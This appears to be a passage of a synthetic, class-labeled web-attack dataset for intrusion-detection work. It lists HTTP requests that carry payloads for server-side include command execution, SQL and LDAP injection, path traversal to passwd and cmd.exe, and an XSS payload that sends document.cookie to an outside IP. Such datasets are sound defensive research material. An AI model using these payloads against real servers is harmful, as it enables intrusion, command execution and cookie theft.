Content-Location: http://www.A3thaoAe.be/oibR/asei/3eAa/Ssrixe.asmx
Content-MD5: bWQyb296ZUhtb2lzU3dobw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 24 Oct 09 06:14:06 CET
Last-Modified: Wed, 13 Jul 05 02:34:29 CET
Host: 33.150.139.230
Connection: close
Accept: video/quicktime, audio/x-wav, text/*
Accept-Charset: windows-1252, x-mac-cyrillic, x-mac-chinesetrad, windows-1251
Accept-Encoding: identity, compress;q=0.6
Accept-Language: steT1cL-tt8jdmr;q=0.3
Cache-Control: no-transform
Client-ip: 48.186.187.130
Cookie: QkXmb_=OR 'y7wb2'    BETWEEN    'R' AND    'T';ti=tn(4aOaahomervn ~t[sgoc;mgnhdhks=atdbfr?@mvretr7n
Cookie2: $Version="00"
Date: Tue, 02 Mar 04 09:52:38 UTC
ETag: "WF4A4@FXbzWEO3h-"
Expect: dpiit9td
If-Modified-Since: Sat, 21 Feb 09 02:57:22 CET
If-Unmodified-Since: Tue, 07 Dec 04 05:29:38 UTC
If-Match: *
If-None-Match: "iBiv.hMdAuFY1jav"
Max-Forwards: 9179
Pragma: aix0wrs='d4Ii'
Proxy-Authorization: 1oi2hy rTepl=hneaC
Authorization: Basic eWFlOGR1b3Q6dXJjaHYz
Referer: /0orthr.avi
TE: trailers,chunked;q=0.2
Trailer: Authorization
User-Agent: Mozilla/0.4 (compatible; MSIE 1.3; Open BSD i586; orac)
UA-CPU: PowerPC
UA-OS: FreeBSD
Via: 5.0 www.c9hhu.tiff, 9.2 53.121.42.217, 8.5 134.106.105.31
Transfer-Encoding: gzip
X-Serial-Number: 58260161
----: ----------------------------

ApLLKra=entsonad1aee &oc=cseat&hbut=8184744942&Nenf=|lsbs&a3mrsec832nrh=802&rrm2oltEisooe=l;qfhr4asI-ekm&FbA8sR4BO=wtdehbsSivhd&_dLSOQ=udnfl]savr(yRytt&heubleve=5755050&GLN-7_7CcDphp5=5iqxl&recr=3ntetcr&rdliNelO=tt$&yt0vw9hretrheo=ewgetet]

End - Id: 42771
Start - Id: 40939
class: SSI
GET /pqqwqataoq5/nahtnweeoeunoo/sbabno/totwk2aOa5nb/hctmmzdqA/aJ/rrtaldsa5lfgm.pl?uw=27499&he=ap1%5D&uh9ij7oj3=eh8sru0dte&iartt9oeLIalir=230671&cS_G3=iByRzebH0&ellpfgdtc=qswherem%7Elarjexeco9qA&Raeksa=%3C%21--+%23odbc++statement++%3D%22select++rl5roe%2C+++++Elhar%2C++++MlybeSG1++++from+r0etovs6+order++by++2%2C++083%2C++8%22+--%3E HTTP/1.1
Host: 199.76.106.67:80
Connection: keep-alive
Accept: text/html;q=0.4, audio/*;q=0.1
Accept-Charset: iso-8859-5;q=0.1, x-mac-cyrillic, euc-cn;q=0.0, cp-950;q=0.0, cp-950
Accept-Encoding: deflate, gzip;q=0.4, compress;q=0.4, deflate
Accept-Language: tettnyh-hk9An;q=0.4, iaetue-xonIoi4i
Cache-Control: no-transform
Cookie: nxn=cbnp=Tbodyouyh1ib;szn5t=83403783
Cookie2: $Version="722"
Date: Thu, 01 Apr 10 07:24:28 GMT
If-Unmodified-Since: Thu, 09 Jul 09 24:42:51 UTC
If-Match: *
If-Range: *
Max-Forwards: 7724
Authorization: Digest nonce
Range: 4-
Referer: http://www.yqsgEgi.biz/hEcjj/psiebl.nsf
TE: deflate;q=0.8,trailers,trailers
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 2.1; dc-el; rv:2.4.5) Gecko/04002986
UA-Color: color8
UA-Pixels: 877x4813
Transfer-Encoding: gzip
----: ----------

null

End - Id: 40939
Start - Id: 39978
class: SSI
GET /c2wT7n/tPAn2kKMEEQ2/nbf1hshx/a@2z0rlAfLBJi/t4J5EFgp9Tlt8KhT/mi.pl?hslueaolaa=Nr&vu8rEtemb=2808774&Elytpl=55&eey7wth=icaeefdropkaarincludevar++rim%27e&Yupdateddocumentv.A=s1s&li33GlarMo=0200&uzetl=aN4d-jMiT&etcWo1XW9bosani=%27sanoptriidpg&9bsd4=%3C%21--++%23exec+++cmd%3D%22%2Fbin%2Fls++-l++%2Fhome%2Fptosls%2FRifeeta8A%22+++++--%3E HTTP/1.1
Host: 96.64.144.36
Connection: 8eadcbO
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: tsrcnnl-o5ohtb;q=0.2
Cache-Control: no-transform
Client-ip: 82.49.151.0
Cookie: ow=anr;twase6didln=9sMi;sacbfseep=oiaba&http>os2g;ftP9Yiiu3=27867970;cloetsb=te08oo;DBRe=371
Cookie2: $Version="35"
Date: Tue, 29 Dec 09 02:10:43 GMT
ETag: "syLbFXo8hSf7y.nXN"
Expect: 100-continue
From: hmiSezi@the9ciIr.cz
If-Modified-Since: Fri, 18 Sep 09 03:37:33 GMT
If-Unmodified-Since: Mon, 09 Jul 07 03:36:18 UTC
If-Match: "u1YdDrP@zSHRr3Q"
If-None-Match: *
If-Range: Fri, 23 Jan 04 06:53:55 CET
Max-Forwards: 972
MIME-Version: 7.9
Pragma: 0e='tM'
Proxy-Authorization: aHtMee s2lgu=6eHelq
Authorization: Digest nonce
Range: -038647,3950-886928
Referer: /pEedo/acitbre/ereoOn.doc
TE: trailers,chunked;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/9.5 (compatible; MSIE 8.7; Open BSD i386; ucnrNcilnY; ase9Gvhiar)
UA-CPU: Sparc
UA-Disp: 8616,110,16
UA-OS: WinNT
UA-Color: color16
Via: 6.3 www.truu7.png, 1.2 49.142.20.225:144, 4.3 217.223.66.154
Transfer-Encoding: compress
Upgrade: eto/0.2, rok/5.4, dgyt4O/7.3, hii8/8.4, hooeh/2.3
Warning: 988 144.42.79.118:49591 "sspeenqeLi3zyDee" "Thu, 16 Jun 05 19:34:26 GMT"
X-Serial-Number: 754321
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39978
Start - Id: 46029
class: PathTransversal
GET /s5/ellta25r2to/EetoootzjntdTpRrnon/cbtmeaeu7s.gif? HTTP/1.0
Host: www.CMteiozf.st
Connection: keep-alive
Accept: image/jpeg;q=0.5
Accept-Charset: iso-8859-5, x-mac-greek;q=0.6, utf-8
Accept-Encoding: compress, deflate;q=0.6, deflate
Accept-Language: /,,,/sta1zb2/4eatah/passwd
Cache-Control: ayxult='o'
Client-ip: 131.167.26.122
Cookie: Hq6@F@r=iframetorm;n8cC8ueeli=Tfelseb;5yA6=eVvu;eaerheAsmIyiere=IdwimgmsiHynem;yepnseic2aTshl=jmjcoosNilagNR4pac;aps=stltey3nsiiguna
Cookie2: $Version="02"
Date: Tue, 08 Aug 06 24:42:51 UTC
ETag: "EZn5TZzGo56qM5vSf"
From: epmndmfY@vm5t.be
If-Modified-Since: Wed, 04 Mar 09 01:41:33 GMT
If-Unmodified-Since: Sun, 02 Aug 09 13:10:34 GMT
If-Match: *
If-None-Match: *
If-Range: "-HO71jxmPDW6nBa2lciH"
Max-Forwards: 76
Pragma: no-cache
Authorization: Digest qop=ySteten
Range: 5-5186,-44
Referer: /itlab/uro5snCr/rrtR/nEddmsgc/ttlen.avi
TE: deflate,chunked
Trailer: Authorization
User-Agent: Mozilla/3.8 (Machintosh; U; PPC 5.8; 4l-tA; rv:2.8.5) Gecko/69656332
UA-CPU: Sparc
UA-Disp: 182,7559,16
UA-OS: Windows NT
UA-Color: color16
Via: 7.1 www.anmleds.js:45
Transfer-Encoding: identity
Upgrade: 1eo/9.5
Warning: 143 www.eihfkbo.htm "7taunsi" "Fri, 01 Apr 05 24:33:27 CET"
X-Forwarded-For: 20.101.217.179
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46029
Start - Id: 39777
class: SSI
GET /3usiiZAe7eq/zwaxdhVuIYF3cHoA/czrNeq4C_bAE8ARg.pl?Oo0JI2G6wAicmd=%3C%21--+%23include+virtual%3D%22%2Fvar%2Flog%2Fhttpd%2Faccess.log%22--%3E&.F9baLeEq7execF=svMFYWNyB HTTP/1.1
Host: www.3onnslIEo.gov
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.3, identity
Accept-Language: E2-dtle, 58i-xtiancal;q=0.5
Cache-Control: max-stale
Client-ip: 211.6.11.10
Cookie: oa=rael;atCzrd354hip=0420
Cookie2: $Version="35"
Date: Fri, 25 Jan 08 18:57:28 CET
ETag: W/"KSzsWAvMIoWhFfKvCC"
Expect: ae0oP=nu1EYl;0lwbh5rr=kbremoe0
From: 6Rvlor@tljncre.cz
If-Modified-Since: Thu, 08 Jul 04 24:46:17 UTC
If-Unmodified-Since: Fri, 28 Jul 06 20:20:08 UTC
If-Match: *
If-None-Match: "Z3npkwj.LoKh@3Dm"
If-Range: Mon, 19 Nov 07 01:25:07 GMT
Max-Forwards: 5
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: aqmos h5eilr=rpma
Authorization: NTLM b2h0aXBtOW5tRXJpZk9rMGNlb2VlaGRuQWF0cmNzaXJJTnVhNG1lb3UwbUFpbQ==
Range: 2208-72
Referer: /iye8to/eere/tpoDrhrT/reepr/timd.sh
TE: trailers,deflate;q=0.6
Trailer: Accept-Charset
User-Agent: Lin2iu/0.0.7.1
UA-CPU: 68000
UA-Disp: 168,5642,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 357x4433
Via: 4.1 www.oaie.htm
Transfer-Encoding: identity
Upgrade: Fcncth/8.5, tSieoY/0.0, qnbm/2.6, dla/6.1, tyuhob/1.6
Warning: 205 www.oith.gif:14611 "vu8fShfdar5iamtid4" 
X-Forwarded-For: 127.158.27.136
X-Serial-Number: 544346041743957641
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 39777
Start - Id: 42159
class: SqlInjection
GET /ak7fsPeZ/0os99/jrlNTwPlibuc6/0L.GHhpkc/zjD/qsNsS-D.5./wo/ssvi_JwmPrfrwkwd/stmdssyeduceNo4liNl.gif?WaPcsXnUOI4O=eo%2F%3Egwa9%5D4cmn%26cRincludeo&Nisnluh2mg=jtbodyA&khDNGy.=%27++or++++id+++++in+++++%28+++++select++*++++from++++++user_db++%29&cmSf=ct%27a+Trahttpsemeeex+s&kiOyen=+Uio HTTP/1.1
Host: www.sorGirIon.org:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: x-mac-chinesesimp;q=0.2, windows-1250, euc-cn;q=0.4
Accept-Encoding: identity;q=0.4
Accept-Language: pwzni0ia-eqeu;q=0.0
Cache-Control: max-stale
Client-ip: 154.205.192.119
Cookie: suehwae7bmhtre=a+se ;nkohnfat=5;ssgfo=uscnvohl;ATgio=hhEz todaluniontmpinputc
Cookie2: $Version="18"
Date: Fri, 21 Jul 06 23:23:45 GMT
ETag: W/"q9@-@42oTbHORdulE04"
Expect: aho2Bm=aetsd4di;yyd5s
From: tktabU@4ahlq0ig.org
If-Modified-Since: Mon, 23 Mar 09 06:32:03 UTC
If-Unmodified-Since: Mon, 28 Aug 06 18:14:01 UTC
If-Match: "WC_sA9U12wVxJI9ag"
If-None-Match: *
If-Range: Sun, 05 Jul 09 21:38:34 GMT
Max-Forwards: 63
MIME-Version: 5.8
Pragma: tyn1nq='pC3'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: Basic QW5oYmlwcmw6TmkzM2x2
Range: 4781-
Referer: /eiTasnss.gif
TE: deflate,trailers
Trailer: Expect
User-Agent: btBs (s0CORTXSfc; xhJuQcOACK; gVsJGb; tpmTm48)
UA-CPU: StrongARM
UA-Disp: 234,2266,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3499x504
Via: 7.1 135.172.215.71
Transfer-Encoding: gzip
Upgrade: cosqd/4.3
Warning: 795 www.ocntp.jpg "satrsjzkse" "Sat, 22 Aug 09 08:49:22 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 036660331124122
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42159
Start - Id: 38922
class: LdapInjection
GET /t3wQ15MVV/snjtxo9s4nrnyce/c7/owvKEJnqOOWSK2/Y./i6u/etnufh0XLpMsmdC.swf?bvoNXnF=6&rsu8rtav=o&r7e=41749&bdrza=%29++++%28++%7C++%28nx%3Doesc*%29 HTTP/1.0
Host: 11.176.135.39
Connection: hma6t
Accept: */*;q=0.0
Accept-Charset: *;q=0.5
Accept-Encoding: *;q=0.4
Accept-Language: aHet4i6-hvkcrS;q=0.6, c7ne-opyOt, Awa1sra-tctfngO, w17d7m-oqreiqh6;q=0.8, i-obi;q=0.5
Cache-Control: min-fresh=1353
Client-ip: 200.72.166.1
Cookie: eDvitioop8e=84737;iaa4oeRpo=i1/er;1rEeaElldtwsh=sd3iyXUGG;eosutttE=sesortnemtn8hdsihw;ueaszsilatpEr=ePhaoneEti2boinaid;rseejthEhH=05
Cookie2: $Version="052"
Date: Thu, 01 Jul 04 24:50:12 UTC
ETag: "D3E_YyiAKOdMA4jb"
Expect: hSstt
From: Utnn8c@iodssieo.biz
If-Modified-Since: Wed, 24 May 06 11:50:44 GMT
If-Unmodified-Since: Sat, 13 Mar 04 18:31:35 GMT
If-Match: "JjcgqV2N7Yqck7c1k7"
If-None-Match: "K23T_iUBBq7hnmL9"
If-Range: Thu, 17 Sep 09 04:51:04 CET
Max-Forwards: 8
MIME-Version: 7.2
Pragma: 7eHape='To8ei'
Proxy-Authorization: i69e riaS=otzepawh
Authorization: Basic TTBPZ2g2dGg6aGk3a2Fid0E=
Range: 49-,0149-664723,864-
Referer: http://6fuaoth.de/5iost/seeDsch/afibneui/ayvoa.cgi
TE: chunked;q=0.6,gzip;q=0.5
Trailer: Pragma
User-Agent: pgsuev@sL http://www.ooae.gov
UA-Disp: 518,9521,8
UA-OS: Windows 98
UA-Pixels: 024x188
Via: FTP/2.6 www.elUihiei.png, HTTP/8.6 113.21.215.92, 8.3 121.63.118.97
Transfer-Encoding: gzip
Upgrade: tydnft/3.9, LrdO/1.4, een6vn/4.0
Warning: 241 39.229.17.174:8 "buhh0su2aszm" 
X-Forwarded-For: 53.112.199.132
X-Serial-Number: 498357729
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38922
Start - Id: 37138
class: LdapInjection
GET /hX4vhtA/htoOsOefehineelgrso.html?eu4tY=s+Iarc%278r+I&wUBtF79pAxR=hkgreLsabhmnv&zB2-vIq=1363901&lh=%5Ce&btln=2C5iz&ouaohm34=E%27eoap&trsawcdrkpa=592&friyurnt8=6&mRwgetWEdJhtpass=23&nfakni79ha=eJS0e3wcslr&aB6jugEeosag=sihe7&c.eq3=%29+%28+++%7C+++%28displayName%3Dhad*%29++%28name+++%3D++++had*++++%29%28mail%3Dhad*+++%29&igsSh3wq=i%24&Phl34=escopyAm%25&ehrjrlct6d=o+in%5DvOee%2Bhh HTTP/1.1
Host: www.utwdogvs.cz
Connection: ceod
Accept: audio/x-wav, text/*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: u372EHht-ucitR, rrwr5e-t, hn-nLsun93g
Cache-Control: max-age=25938
Client-ip: 249.30.190.230
Cookie: sa8lOfee=3507015;ype=fsezmn9nrlAd
Cookie2: $Version="980"
Date: Thu, 18 Mar 04 01:53:04 CET
ETag: "Rits1UwssAAAZBA"
Expect: alsou
From: ke6iat@otEmem.org
If-Modified-Since: Mon, 21 Feb 05 05:35:05 GMT
If-Unmodified-Since: Mon, 04 Feb 08 05:05:30 UTC
If-Match: "1a6Mi1dl.UsE3pbzY"
If-None-Match: "9sZm3-xP@SjbYoETlP"
If-Range: *
Max-Forwards: 9
MIME-Version: 8.7
Pragma: sd96=boUOell
Proxy-Authorization: NTLM d2FvU3JvaXRDZGNlSWhlbk9wRWVjdGJlb2hrcmVjZWQ=
Authorization: Basic OWMyM2U6N3RidDU=
Range: 1-,52545-
Referer: http://www.llei.ch/s0i9sbai/pihef/iSLt/cegn/odlh.asp
TE: chunked,deflate;q=0.5,gzip;q=0.1
Trailer: Accept-Language
User-Agent: jMrotsRe (dTnD5hcit)
UA-CPU: StrongARM
UA-Disp: 529,581,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 617x3755
Via: mfev/5.4 149.33.162.221:7
Transfer-Encoding: h1qs; t6eeri7=mmse
Upgrade: wmql/6.4, spti/9.8, omtd/7.6, Heei/8.4
Warning: 068 www.caus6t.html:451 "nAiwBaHg" 
X-Forwarded-For: 84.40.27.181
X-Serial-Number: 4738976742686812
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37138
Start - Id: 37331
class: LdapInjection
GET /binwDetcEF7UAcopyz/e.708s/hzh5Us/atXVQnzZs-yJ1tXLQ91_/onbezeprlthdewO/zJjhR19y6xNXqBI7OkL/nsDa7zmaoee9rcSge.htm?Eyire6a23ed=7&meuo=x&position4ykP8@M1=bty&Aesss4ane=6603448&g8OF68palla=8shtaccesf2ii%28Er+w%25uwhwtie8&FiiOadn=ns5%28tlemieaddre-edps%5C&AQpasswd_.SIqxOPJ=%3Adtq%28+et%3E%3Etao%26r&hrneo2E1=rulh93fromtdphphkmn+&m2Iukrl2e=2&1DnetcatZtKG=sraxtUia&a4e1f=taraoooe7e&mMQXZ0pD-CN=aoslysUrkdej&qdtitsthi=630055814&xtdcoarinjs0l=e&8xrieitg1a=nil HTTP/1.1
Host: 152.224.209.195
Connection: keep-alive
Accept: text/*;q=0.3, image/gif, audio/x-wav
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.1
Accept-Language: ilts)(&(objectClass    =tedE*)
Cache-Control: Obae=euNel
Client-ip: 8.243.125.138
Cookie: Otefahse=r0zksehotendey;ai=nal;GexeccxRT=upa4;itit=85;lieealeo2zha=or6x9cn7edhh2m
Cookie2: $Version="04"
Date: Wed, 06 Apr 05 01:48:13 GMT
ETag: "I5@nXeWMg68m-D6B"
Expect: snAlAi=idgRonN;arOnfae3=oezoVT
From: ddtp@lesT.org
If-Modified-Since: Tue, 24 Nov 09 24:19:37 GMT
If-Unmodified-Since: Tue, 10 Jan 06 15:46:10 UTC
If-Match: "vntn6dZCID_3DKuBI"
If-None-Match: "_AJRVlHBULjVCsD"
If-Range: "645IEVh_uxmGMalna2PK"
Max-Forwards: 2
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: lsrrid nactta1e=moee
Authorization: Digest qop=auth-int
Range: 1-568088,6956-8,075-
Referer: http://e9ns68dm.cz/snetmno/Esmtja9n.jsp
TE: gzip,gzip;q=0.9,trailers
Trailer: Range
User-Agent: Auhsa5ds
UA-CPU: 68000
UA-Disp: 2661,0577,16
UA-OS: Solaris
UA-Color: color16
Via: 1.8 www.heTdc.jpeg:64723, FTP/7.2 137.162.177.89, 7.2 95.251.84.190
Transfer-Encoding: identity
Upgrade: iHmLaa/1.0, enm/6.7, Feqe/5.3, 5la06/5.6
Warning: 644 www.kr8o.htm "Jnrqtdtsr4kgdnb5i" "Fri, 25 Aug 06 23:03:26 GMT"
X-Forwarded-For: 100.131.43.78
X-Serial-Number: 06549032
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37331
Start - Id: 47651
class: XSS
GET /iymD4mpd2MgtvhrA/tR-aIqW@C84/eh-HBUzFU0V/E4LOAa2qN_UQjil/y7xf3Q0L6Z@yfpn58/eLaWEv/1heerqh/ZRzmFDVlikeJ.css?hssn=%3Cimg++++src+++%3D+++%22+++++mocha%3A%5Bwindow.open%28%27http%3A%2F%2F239.185.162.94%2Flion.jsp%27%2Bdocument.cookie%29%3B%5D++++++%22+++%3E&lajet1pfsnbezvo=ay HTTP/1.1
Host: 143.127.115.147
Connection: keep-alive
Accept: video/quicktime, video/mpeg, video/*;q=0.1
Accept-Charset: iso-2022-kr;q=0.9, x-mac-icelandic, iso-8859-15;q=0.8, x-mac-korean, iso-8859-3;q=0.5
Accept-Encoding: *;q=0.2
Accept-Language: k-dnF, lqhel-taHwmbwy;q=0.2
Cache-Control: max-stale
Client-ip: 168.210.69.11
Cookie: niEg4garrmtihf=hL3z7r;cy8Tfhl=iepunrgenc;kOoHrfutD=tZ3QP;bcenesRq=692180;xRAdoAEh=1w1tm;L6GkanE=8801064
Cookie2: $Version="8"
Date: Thu, 17 Apr 08 21:34:27 GMT
ETag: W/"HdQF3OlRjugb5Pl2R"
Expect: 100-continue
From: tdjaSrwt@arqsc.uk
If-Modified-Since: Mon, 02 Feb 04 24:26:39 CET
If-Unmodified-Since: Mon, 15 Aug 05 17:20:20 GMT
If-Match: *
If-None-Match: "L7y3aBTEIUbwi9IMT1l"
If-Range: *
Max-Forwards: 651
MIME-Version: 7.7
Pragma: e=dteai
Proxy-Authorization: Digest nonce
Authorization: NTLM cm84aWJnZW9sbXNzbnR3ZWxueGE0c2V2cnd0bjV0dTJtbnE=
Range: 51-,059585-
Referer: /awunarp/0sym/aIseboet/henit/atuer2o.sh
TE: gzip;q=0.3,chunked;q=0.1,gzip
Trailer: Via
User-Agent: Mozilla/4.9 (Windows; U; WinNT 8.3; na-eO; rv:0.1.5) Gecko/96271946
UA-CPU: x86
UA-Disp: 434,760,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 635x1311
Via: FTP/4.7 www.otsd6.shtml, 6.5 www.0ajg.jpg, 0.9 206.142.107.158
Transfer-Encoding: gzip
Upgrade: lica5r/6.9
Warning: 566 31.172.243.106 "c7nne1icSkIuSipo" "Sat, 17 Jan 04 22:31:55 GMT"
X-Forwarded-For: 253.174.138.228
X-Serial-Number: 6943669939
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47651
Start - Id: 44857
class: PathTransversal
GET /ueFSXlV4kmnJ7Y/7uXVivGA3l/aoiTYwenthc1sytemsit/ea9Ceettttthxal/aelpsEthetCetxhh/wnra/efJTCZ.WUC2JwPPB/iwsiamejr8uttujgwen/iXtuodiapHe7naehn/In.SI/OtEsetoupedesostss/eHCRs.jsp?eehdgf=icrfptinetntrlmft&oopis6e9o=89889708&tmeecennBts5sdi=zqonjsjsmmn&eertl=tMMxtE&sa=dpa3o%28TOvbscriptdxee&n8aoioUS=60364&nhesor=5721&Z@Bnyhavingc9Nkn=afZoy%40Bus&selheapdo70e=file%3A%2F%2F%2Fn%3A%2Fxri%2F6kxuz%2FHnaieH2.xml&emcnomi1nmriNh=h3rSjwc&noOtetIt7=8568 HTTP/1.1
Host: 206.92.250.30
Connection: close
Accept: audio/basic, text/html
Accept-Charset: iso-8859-2;q=0.7
Accept-Encoding: compress
Accept-Language: fror-o, bjda6hYn-5kbtnrt
Cache-Control: only-if-cached
Client-ip: 31.199.198.5
Cookie: 5jTEmt@-KyKinput=8ehe97
Cookie2: $Version="27"
Date: Tue, 15 Feb 05 11:36:05 UTC
ETag: W/"2Hr_1mB_sXpKsq.@5EV"
Expect: eloob=qdejeads
From: netotmi@oanhTettwr.cz
If-Modified-Since: Fri, 19 Feb 10 11:38:26 GMT
If-Unmodified-Since: Mon, 11 Feb 08 18:20:34 UTC
If-Match: *
If-None-Match: *
If-Range: "Gp7y_H44dVZHIAb"
Max-Forwards: 03
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic dWRlNmk6eG1ocHA4Zjk=
Authorization: NTLM ZG50dWU0bm93ZWVkTjhjZXZvcmE1ZGhsc291UGVkZnRmbnVldXRlcg==
Range: 3752-,303-8,-33345
Referer: http://www.3EtLq.it/0obadu/hhdeeafl/aimoUc/Exanjwo.tiff
TE: trailers,trailers,gzip;q=0.8
Trailer: Date
User-Agent: Mozilla/7.7 (compatible; Konqueror/5.9; SunOS sun4u; s1tTi; si1stn; uettnhn)
UA-CPU: StrongARM
UA-Disp: 7085,0272,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 458x842
Via: FTP/5.9 www.Oouttx.html, f5er2/7.2 www.opwioeiP.jpg, 1.9 72.32.105.251
Transfer-Encoding: compress
Upgrade: elir/9.8, ylr/3.8, e0ge7/5.0, Son/5.8, deHi3/3.2
Warning: 565 www.9hmbio.js "egRIp9dtnpPtahcsat" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 24997
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44857
Start - Id: 42417
class: SqlInjection
GET /hF350vZj1bNhC./iwj/WZTBmochaCZJzj2Dj/TiV0KMQdeleteow3/AthtiEuie1o/9tefeuokEenlertyums/@nMH/bNFZR1XDq-6.v9RKB/deyE7wivwbes/y8o8Tdnnhhadne/9M-wWg3/I@XNrDP.png?cs=8.YpYRr&obI6to=annn+&3trk=trsszrIoeg%2BUnwenieon&eh9psomsteiats=OR++++%27Adt%27++++%3D+%27+%27&glCCKkhy2y=13831&ettsnta0eca=-nkttjkloledmaeon&naoabbllusns=nrtiaenxinildl&antjeoeo9t=%7Ei+pt%3A4g&eeu6toepbSso=u7__LFh9&92bdbetweenJmT.h5=rj_&txrpdrurced=q9q0Z HTTP/1.0
Host: 188.77.3.1
Connection: zrpceej
Accept: */*;q=0.2
Accept-Charset: cp-932, x-mac-hebrew, gb2312
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 179.176.205.80
Cookie: erong47mhdareol=rhttMvtg5rPdwvltbd;e1AorkPuisa=895581;sonrnlodHse=iklmail7ifromt;-Ny5GdZsm=ioi7Ost;88=sTvoer
Cookie2: $Version="78"
Date: Wed, 03 Oct 07 17:58:41 UTC
ETag: "ihNWxKiFaZe3DCw"
Expect: 100-continue
From: Tm9x@je4xi.it
If-Modified-Since: Thu, 01 Apr 04 14:45:31 CET
If-Unmodified-Since: Wed, 03 May 06 05:50:21 GMT
If-Match: "-ffPhpV3OKtYwCFYBc"
If-None-Match: *
If-Range: "idDGCh2fXpJaK9HpvV"
Max-Forwards: 9255
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic YWV0ZWJwdzplbHdOZm1lcg==
Authorization: NTLM V2hvOXR0dG5uRmF3ZEVhbzllbTF0c1VrZXZpaGk2bklaOGVYVWl3ZW9jZlBk
Range: 005696-6624,4-
Referer: /ztsjddia.js
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/5.4 (Windows; U; WinNT 1.6; uj-i6; rv:4.0.4) Gecko/94731220
UA-CPU: 68000
UA-Disp: 4009,500,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 189x646
Via: 6.0 www.atynP.gif, 9.1 www.tsSraiu.gif
Transfer-Encoding: compress
Upgrade: 3w4vo/5.2, oee9/2.0, ot6Q/5.5, ergojg/6.9, u2osoe/4.9
Warning: 520 206.128.137.82 "k8cmwoU" "Thu, 21 Jul 05 08:42:03 UTC"
X-Forwarded-For: 120.46.59.231
X-Serial-Number: 2317427
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42417
Start - Id: 38653
class: LdapInjection
GET /6hLBTtRqV7/8e/uIT93Q9AEuMUdB.mspx?na1bMus=iszY4gvD&Kechomh_AZS=t9&8iiiIeahrnro=rtifrrhtn&y9@N@AGXFi=atChg-Jm94-V&rek=e9vtYIvbKdAK&0Zo5cf=2exec%24DrfeNy&yidneQasi=olanHoaro7e&ie6Ahion=%25+v&sNst8lrbp7=Nhaes%29%28+%7C%28sr%3D*%29 HTTP/1.1
Host: 2.7.4.73
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: *
Cache-Control: max-age=938
Client-ip: 48.249.181.128
Cookie: 4pee=a.vF6.l;za4dnhnqcyesto=9126;ynO9no=mo1smnti4am4tbe;6e92D1vdocument8n=i9WwZB9x_hi
Cookie2: $Version="2"
Date: Fri, 17 Mar 06 07:14:12 GMT
ETag: W/"C_oEOWbf.c0XOh-@yGhp"
Expect: wof9
From: t4byed8@l9nss.fr
If-Modified-Since: Tue, 23 Jun 09 15:16:06 UTC
If-Unmodified-Since: Tue, 11 Jul 06 15:51:22 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Basic YUtqaWUxOmFkTHI=
Authorization: NTLM aGRkMmlnb3M4dThlOEVFcmRobmFHaHFBYW5oYW5ydTQ=
Range: 6-,-12392,3-
Referer: http://uSsensiH.uk/18oE/ee4wdym/oerAj/assl/5w5Zidy.gif
TE: chunked;q=0.2,gzip;q=0.4
Trailer: Accept-Encoding
User-Agent: Mozilla/6.7 (Windows; U; Windows NT 8.4; mv-lY; rv:2.3.1) Gecko/38392334
UA-CPU: PowerPC
UA-Disp: 397,637,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 774x1723
Via: 1.4 www.gxei.shtml:2, FTP/7.4 www.lzSt.js
Transfer-Encoding: compress
Upgrade: htaa/3.0, ralts/8.0, setesh/3.4, ildF/3.2, ingq/2.6
Warning: 923 31.36.82.245:31824 "1y3pAs" "Sun, 03 Oct 04 18:11:26 UTC"
X-Forwarded-For: 72.129.37.147
X-Serial-Number: 15901278083
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 38653
Start - Id: 43746
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 241.127.163.221:80
Connection: keep-alive
Accept: video/mpeg;q=0.2, image/*
Accept-Charset: iso-2022-jp, euc-cn;q=0.2
Accept-Encoding: 
